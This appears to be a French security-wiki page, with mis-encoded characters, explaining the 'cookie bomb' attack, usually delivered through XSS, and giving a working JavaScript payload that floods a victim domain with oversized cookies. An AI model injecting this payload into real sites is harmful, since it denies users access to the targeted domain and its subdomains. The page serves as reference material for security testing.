๐ŸงจCookie bomb

Ce type d'attaque consiste ร  injecter un grand nombre de cookies volumineux assignรฉs au domaine cible dans le navigateur de la victime afin de rendre inaccessible l'accรจs aux domaines et sous-domaines de se site. (gรฉnรฉralement exploitable via une XSS).

Exemple de payload:

setTimeout(function(){for(i=0; i<100; i++){
    document.cookie='a'+i+'='+('a'.repeat(4000)+'; path=/; domain=.victim-domain.com')
}},10000);
PrรฉcรฉdentHash floodingSuivantAutre

Derniรจre mise ร  jour